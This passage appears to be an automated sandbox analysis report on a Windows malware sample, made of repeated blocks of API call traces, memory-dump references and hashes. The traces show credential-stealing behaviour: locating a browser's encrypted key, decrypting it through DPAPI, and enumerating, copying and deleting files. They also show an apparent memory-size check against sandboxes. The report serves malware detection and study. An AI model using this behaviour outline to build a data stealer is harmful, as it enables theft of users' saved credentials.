                                                                                                • Opcode Fuzzy Hash: 6c6fb7d06333238994955fa4e9c6fc16004326b07765d99504ffdab069fb4719
                                                                                                • Instruction Fuzzy Hash: 9541A471E101099BCB04EFA5D945AEEB779AF44314F00801EF51677291EB78AA84CFAA
                                                                                                APIs
                                                                                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
                                                                                                • GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
                                                                                                • LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
                                                                                                • ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
                                                                                                • LocalFree.KERNEL32(00410447), ref: 0040A1E0
                                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040A1EA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                • String ID:
                                                                                                • API String ID: 2311089104-0
                                                                                                • Opcode ID: a501a1be7f016b5cb91172ca14ff62cfed5f90a871d90683b41ae69171fc1efd
                                                                                                • Instruction ID: e28607e9d9a2a96074382c0c0d30a82733061daf82e5a8752830093732aacc78
                                                                                                • Opcode Fuzzy Hash: a501a1be7f016b5cb91172ca14ff62cfed5f90a871d90683b41ae69171fc1efd
                                                                                                • Instruction Fuzzy Hash: 9731FC74A01209EFDB14CF94D845BEE77B5AB48304F10815AE911AB3D0D778AA91CFA6
                                                                                                APIs
                                                                                                  • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                                                                                • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 004151CA
                                                                                                • lstrcatA.KERNEL32(?,00421058), ref: 004151E7
                                                                                                • lstrcatA.KERNEL32(?,0096C548), ref: 004151FB
                                                                                                • lstrcatA.KERNEL32(?,0042105C), ref: 0041520D
                                                                                                  • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414B7C
                                                                                                  • Part of subcall function 00414B60: FindFirstFileA.KERNEL32(?,?), ref: 00414B93
                                                                                                  • Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC4), ref: 00414BC1
                                                                                                  • Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414BD7
                                                                                                  • Part of subcall function 00414B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00414DCD
                                                                                                  • Part of subcall function 00414B60: FindClose.KERNEL32(000000FF), ref: 00414DE2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                                                                                • String ID: cA
                                                                                                • API String ID: 2667927680-2872761854
                                                                                                • Opcode ID: 50cdb846a6905c3154a992a53ea717169949dcf7ee024cd193e9a8a380c2694b
                                                                                                • Instruction ID: dc16e4b81abbfe3fe676fda19ddb0faac8fab1e973e0b9c2e11f24d889f851c9
                                                                                                • Opcode Fuzzy Hash: 50cdb846a6905c3154a992a53ea717169949dcf7ee024cd193e9a8a380c2694b
                                                                                                • Instruction Fuzzy Hash: CD21C8B6E04218A7CB14FB70EC46EED333E9B94300F40455EB656561D1EE78ABC8CB95
                                                                                                APIs
                                                                                                • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                                                                                • __aulldiv.LIBCMT ref: 00401258
                                                                                                • __aulldiv.LIBCMT ref: 00401266
                                                                                                • ExitProcess.KERNEL32 ref: 00401294
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                                                                                • String ID: @
                                                                                                • API String ID: 3404098578-2766056989
                                                                                                • Opcode ID: 878a90f34e096d30e7d89448c69a574e23fa6b892c1598a4a852eafceae412f3
                                                                                                • Instruction ID: 198c605b63268064c6e3321c907f2861ebf30c0b4d659eb8408d118d522d9ff8
                                                                                                • Opcode Fuzzy Hash: 878a90f34e096d30e7d89448c69a574e23fa6b892c1598a4a852eafceae412f3
                                                                                                • Instruction Fuzzy Hash: 88014BF0D44308BAEB10DFE0DD4ABAEBB78AB14705F20849EE604B62D0D6785581875D
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID: memcmp
                                                                                                • String ID: 0
                                                                                                • API String ID: 1475443563-4108050209
                                                                                                • Opcode ID: 3febbe9025790a98fcc424e7053522d0f7b55d065d40a9560c436ebf9cdeed3d
                                                                                                • Instruction ID: 3bb57cbd4086e38ca070a1eb41e2420ec87b0c0feb17810d174f813009c16240
                                                                                                • Opcode Fuzzy Hash: 3febbe9025790a98fcc424e7053522d0f7b55d065d40a9560c436ebf9cdeed3d
                                                                                                • Instruction Fuzzy Hash: 66127D70F05255CFEB05CFA8E484789BBF1AF48318F25C1A9D845AB356D774E88ACB80
                                                                                                APIs
                                                                                                  • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                  • Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
                                                                                                  • Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
                                                                                                  • Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
                                                                                                  • Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
                                                                                                  • Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
                                                                                                  • Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA
                                                                                                  • Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2
                                                                                                • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0040A489
                                                                                                  • Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A23F
                                                                                                  • Part of subcall function 0040A210: LocalAlloc.KERNEL32(00000040,?,?,?,00404F3E,00000000,?), ref: 0040A251
                                                                                                  • Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A27A
                                                                                                  • Part of subcall function 0040A210: LocalFree.KERNEL32(?,?,?,?,00404F3E,00000000,?), ref: 0040A28F
                                                                                                • memcmp.MSVCRT(?,DPAPI,00000005), ref: 0040A4E2
                                                                                                  • Part of subcall function 0040A2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040A2D4
                                                                                                  • Part of subcall function 0040A2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A2F3
                                                                                                  • Part of subcall function 0040A2B0: memcpy.MSVCRT(?,?,?), ref: 0040A316
                                                                                                  • Part of subcall function 0040A2B0: LocalFree.KERNEL32(?), ref: 0040A323
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
                                                                                                • String ID: $"encrypted_key":"$DPAPI
                                                                                                • API String ID: 3731072634-738592651
                                                                                                • Opcode ID: 670b58208e1ff2a3ebe60e827019e5f1f1af2f7c111c07866c18d1fd8af9f875
                                                                                                • Instruction ID: 27b9d937d1eb2b37959d1b0821c640950517226354c316aa9f1795df4e4508dc
                                                                                                • Opcode Fuzzy Hash: 670b58208e1ff2a3ebe60e827019e5f1f1af2f7c111c07866c18d1fd8af9f875
                                                                                                • Instruction Fuzzy Hash: 323152B6D00209ABCF04DBD4DC45AEFB7B8BF58304F44456AE901B7281E7389A54CB6A
                                                                                                APIs
                                                                                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417FC7
                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00417FCE
                                                                                                • RegOpenKeyExA.KERNEL32(80000002,0096E590,00000000,00020119,?), ref: 00417FEE
                                                                                                • RegQueryValueExA.KERNEL32(?,00974360,00000000,00000000,000000FF,000000FF), ref: 0041800F
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00418022
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                • String ID:
                                                                                                • API String ID: 3466090806-0
                                                                                                • Opcode ID: 7a9c0ba5048ddb27ec33de3f8be0389340df971bddb9b3c1683f2c2c2fb7b9da
                                                                                                • Instruction ID: 7366865410052b2090c980cb0782fc53e6cc971cacc9a0cbb18d91746b71e1a2
                                                                                                • Opcode Fuzzy Hash: 7a9c0ba5048ddb27ec33de3f8be0389340df971bddb9b3c1683f2c2c2fb7b9da
                                                                                                • Instruction Fuzzy Hash: 981151B1E45209EBD700CF94DD45FBFBBB9EB48B11F10421AF615A7280E77959048BA2
                                                                                                APIs
                                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                                                                                • RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                                                                                • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 004012FF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                • String ID:
                                                                                                • API String ID: 3466090806-0
                                                                                                • Opcode ID: 105a35557efbe30c530503ad4a66e3d917ab5a2bcfe7a77369b2bd71da3f475d
                                                                                                • Instruction ID: b0bfc99e0bb5f41d030d85d97ebb5ad9faa7414484ca5a523084a8432581bb26
                                                                                                • Opcode Fuzzy Hash: 105a35557efbe30c530503ad4a66e3d917ab5a2bcfe7a77369b2bd71da3f475d
                                                                                                • Instruction Fuzzy Hash: D1013179E45209BFDB00DFD0DC49FAE7779EB48701F00419AFA05A7280E770AA008B91
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID: strcmp$free
                                                                                                • String ID: @$rnal
                                                                                                • API String ID: 3401341699-826727331
                                                                                                • Opcode ID: 04d5e6c441bbf8750f8d4e7631d4b0402e699f56de4de675d1cbd554cb088b02
                                                                                                • Instruction ID: 0ce42be2a52064457b78e7c31244c3f07411abd0ae8e299ce13c5538bbb98839
                                                                                                • Opcode Fuzzy Hash: 04d5e6c441bbf8750f8d4e7631d4b0402e699f56de4de675d1cbd554cb088b02
                                                                                                • Instruction Fuzzy Hash: 70822470A04259CFEB60CF68C880B89BBF1BF45308F2481EAD8589B352E775D9A5CF51
                                                                                                APIs
                                                                                                  • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                  • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                  • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                  • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                  • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                  • Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,00976A20,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                                                                                  • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                  • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040AA11
                                                                                                • lstrlenA.KERNEL32(00000000,00000000), ref: 0040AB2F
                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040ADEC
                                                                                                  • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                  • Part of subcall function 0040A560: memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D
                                                                                                • DeleteFileA.KERNEL32(00000000), ref: 0040AE73
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                                                                                • String ID:
                                                                                                • API String ID: 257331557-0
                                                                                                • Opcode ID: 807784e4d5b4097708b1d81bd8132747ebd3bfe02f60bc97d287e8103a5e3d61
                                                                                                • Instruction ID: 5dfe8597df33c788f82f0551f3ba8d02d272d38f024b71a471f8e3c501a58f6f
                                                                                                • Opcode Fuzzy Hash: 807784e4d5b4097708b1d81bd8132747ebd3bfe02f60bc97d287e8103a5e3d61
                                                                                                • Instruction Fuzzy Hash: A9E134729111089BCB04FBA5DC66EEE7339AF14314F40855EF11672091EF387A9CCB6A
                                                                                                APIs
                                                                                                  • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                  • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                  • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                  • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                  • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                  • Part of subcall function 00417690: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004176D2
                                                                                                  • Part of subcall function 00417690: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041770F
                                                                                                  • Part of subcall function 00417690: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417793
                                                                                                  • Part of subcall function 00417690: HeapAlloc.KERNEL32(00000000), ref: 0041779A
                                                                                                  • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                  • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                  • Part of subcall function 00417820: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417834
                                                                                                  • Part of subcall function 00417820: HeapAlloc.KERNEL32(00000000), ref: 0041783B
                                                                                                  • Part of subcall function 00417950: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,00000000,0041DEF0,000000FF,?,00411EE9,00000000,?,00974400,00000000,?), ref: 00417982
                                                                                                  • Part of subcall function 00417950: IsWow64Process.KERNEL32(00000000,?,?,?,?,?,00000000,0041DEF0,000000FF,?,00411EE9,00000000,?,00974400,00000000,?), ref: 00417989
                                                                                                  • Part of subcall function 004179E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417A10
